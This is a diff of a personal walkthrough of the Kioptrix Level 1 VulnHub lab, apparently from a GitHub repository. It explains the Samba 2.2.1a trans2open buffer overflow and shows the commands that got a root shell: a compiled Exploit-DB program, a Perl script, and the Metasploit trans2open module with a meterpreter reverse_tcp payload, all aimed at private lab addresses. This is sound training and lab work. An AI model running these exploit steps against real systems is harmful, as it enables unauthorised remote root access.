leegengyu/vulnhub-box-walkthrough/kioptrix-level-1.md

 4. Use a [ported Python-equivalent script](https://github.com/0v3rride/Enum4LinuxPy) (that was ported over from the original Perl version)

 ### 2 Avenues to Obtain Root Shell Through BoF Vulnerability ###
+* According to [a cvedetails page for a vulnerability associated with Samba 2.2.1a](https://www.cvedetails.com/cve/CVE-2003-0201/), the name of the exploit is due to a "buffer overflow in the call_trans2open function in trans2.c".
+Accoding to the [SecurityFocus's entry page on this vulnerability](https://www.securityfocus.com/bid/7294/discuss) "The problem occurs when copying user-supplied data into a static buffer.
+By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
+Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process."
 * There are 2 general avenues to get a `root` shell in this section, one through a Metasploit module, and the other through non-Metasploit methods.
 There are multiple POCs available for the latter, especially as seen in the [exploit's section of the remote buffer overflow vulnerability that is used](https://www.securityfocus.com/bid/7294/exploit).
 * Note: Those links listed in the page no longer work (for me at least).
 * Note-to-self: When in doubt if POCs are using the same vulnerability, use the CVE listed as one of the ways to determine.
 I was confused initially because of the naming of the exploit that made me mistake that there were more than 1 vulnerability here that could get us a `root` shell.

 ### trans2open Overflow (Non-Metasploit) ###
-* With the Samba version obtained, our [first Google search result](https://www.exploit-db.com/exploits/10) (which is from Exploit-DB) for `samba 2.2.1a exploit` was able to give us a `root` shell easily - through a `Remote Code Execution`:
+* Our [first Google search result](https://www.exploit-db.com/exploits/10) (which is from Exploit-DB) for `samba 2.2.1a exploit` was able to give us a `root` shell easily - through `Remote Code Execution`:
 ![](/screenshots/kioptrix-level-1/sambaExploitGoogleSearch.jpg)
 * After downloading and compiling the code (`gcc 10.c`), run `./a.out -b 0 10.0.2.12`:
 ![](/screenshots/kioptrix-level-1/sambaRemoteRootExploit.jpg)
 * Note: The `-b` parameter indicates the platform: `0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2`.
 Choosing any of the numbers except 3 would result in a `root` shell.
 * Note: Running `exit` seems to be a little buggy for me, i.e. the shell does not terminate immediately.
+* **Question**: The [second Google search](https://www.exploit-db.com/exploits/7) result (which is also from Exploit-DB) is a Perl script that does not result in any shell (and which also seems to run indefinitely - I killed it after around 10 minutes).
+I ran the command: `perl 7.pl -t linx86 -H 10.0.2.6 -h 10.0.2.12`.

 ### trans2open Overflow (Metasploit) ###
-* The [second Google search](https://www.exploit-db.com/exploits/7) result (which is also from Exploit-DB) shows that the Samba version is also susceptible to a `Remote Buffer Overflow`, specifically a trans2open overflow.
-[A Rapid7 entry](https://www.rapid7.com/db/modules/exploit/linux/samba/trans2open) shows that there is a Metasploit module available pertaining to it for our use.
+* [A Rapid7 entry](https://www.rapid7.com/db/modules/exploit/linux/samba/trans2open) shows that there is a Metasploit module available pertaining to it for our use.
-* According to [a cvedetails page for this vulnerability](https://www.cvedetails.com/cve/CVE-2003-0201/), the name of the exploit is due to a "buffer overflow in the call_trans2open function in trans2.c".
-Accoding to the [SecurityFocus's entry page on this vulnerability](https://www.securityfocus.com/bid/7294/discuss) "The problem occurs when copying user-supplied data into a static buffer.
-By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
-Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process."
-* **Question**: Not exactly sure why the Perl script from the Exploit-DB page does not result in any shell despite running for around 10 minutes.
-My executed command was `perl 7.pl -t linx86 -H 10.0.2.6 -h 10.0.2.12`.
 * Searching with the keyword `trans2open` after running `msfconsole` gives us 4 results, with each being applicable to only the respective OSes.
-We will be using the one for `Linux x86` (**where did we get this piece of information? i.e. how do we know we should be using Linux?**)
+We will select the `Linux x86` one, based on our information obtained earlier from enumeration using a Metasploit auxiliary module.
 ![](/screenshots/kioptrix-level-1/metasploitTrans2openModules.jpg)
 * Alternatively, instead of searching, we can directly use the information given in the Rapid7 page: `use exploit/linux/samba/trans2open`.
 * `options` tells us that we need to `set RHOSTS 10.0.2.12`.
 Running `exploit` immediately afterwards results in many meterpreter sessions being open and 'dying' instantly. `options` shows us that our default payload used was `linux/x86/meterpreter/reverse_tcp`: